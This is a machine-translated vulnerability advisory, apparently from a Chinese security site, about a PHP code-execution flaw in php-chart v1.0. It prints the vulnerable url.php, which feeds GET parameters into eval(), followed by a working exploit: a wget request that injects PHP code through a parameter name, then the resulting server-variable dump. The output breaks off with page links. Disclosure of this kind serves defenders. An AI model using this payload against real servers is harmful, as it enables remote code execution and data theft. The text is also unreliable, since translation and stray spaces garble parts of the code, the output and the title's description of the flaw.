The use of local include vulnerability to execute arbitrary code-a vulnerability warning-the black bar safety net

2013-01-19T00:00:00
ID MYHACK58:62201336798
Type myhack58
Reporter 佚名
Modified 2013-01-19T00:00:00

Description

Impact of program: php-chart_v1. 0

Program official: http://php-charts.com/

Defect type: PHP Code Execution.

===============================================================

Test platform system: Debian squeeze 6.0.6

Server software version: Apache/2.2.16 (Debian)

PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug 6 2 0 1 2 2 0:0 8:5 9)

Copyright (c) 1997-2009 The PHP Group

Zend Engine v2. 3. 0, Copyright (c) from 1998 to 2010 Zend Technologies

with Suhosin v0. 9. 3 2. 1, Copyright (c) 2007-2010, by SektionEins GmbH

================================================================

About the program description:

Php-Charts is basically a class which can be used to generate

different charts(Bar, Pie, Doughnut etc.) in different format(PDF, PNG, JPG, HTML)

using different data source(csv, xml, MySQL, MS Sql, MS Access, PostgreSql,

user defined data).

================================================================

Defect analysis

root@debian:/etc/apache2/htdocs/hacker1/wp/chart/chart/wizard# cat url.php

<? php

require("../lib/phpchart.class.php");

$color_var=array("txt_col","line_col","bg_color");

$cname=$_GET["type"];

$chart=new PHPChart($cname);

foreach($_GET as $key=>$value)

{

if($value!="")

{

if(in_array($key,$color_var))

eval('$chart->'.$ key.'="#'.$ value.'";');

else if($value=='yes')

eval('$chart->'.$ key.'= true;');

else if($value=='no')

eval('$chart->'.$ key.'= false;');

else if(is_numeric($value))

eval('$chart->'.$ key.'='.$ value.';');

else

eval('$chart->'.$ key."='".$ value."';");

}

}

$chart->genChart();

Use:

root@debian:/tmp# wget 'http:// www.myhack58.com //wp/chart/chart/wizard/url.php?$ {var_dump($_SERVER)}=IZABEKAILOVEYOUBABY' -O out.txt && cat out.txt

--2013-01-15 2 1:1 9:1 6-- http://hacker1.own//wp/chart/chart/wizard/url.php?$% 7Bvar_dump($_SERVER)%7D=IZABEKAILOVEYOUBABY

Resolving hacker1. own... 127.0.0.1

Connecting to hacker1. own|127.0.0.1|:8 0... connected.

HTTP request sent, awaiting response... 2 0 0 OK

Length: unspecified [text/html]

Saving to: “out.txt”

[ <=> ] 1,917 --.- K/s in 0s

2013-01-15 2 1:1 9:1 7 (8.56 MB/s) - “out.txt” saved [1 9 1 7]

Notice: Undefined index: type in /etc/apache2/htdocs/hacker1/wp/chart/chart/wizard/url.php on line 4

array(2 8) {

["DOCUMENT_ROOT"]=>

string(2 8) "/etc/apache2/htdocs/hacker1/"

["GATEWAY_INTERFACE"]=>

string(7) "CGI/1.1"

["HTTP_ACCEPT"]=>

string(3) "/"

["HTTP_CLIENT_IP"]=>

string(9) "127.0.0.1"

["HTTP_HOST"]=>

string(1 1) "hacker1. own"

[1] [2] next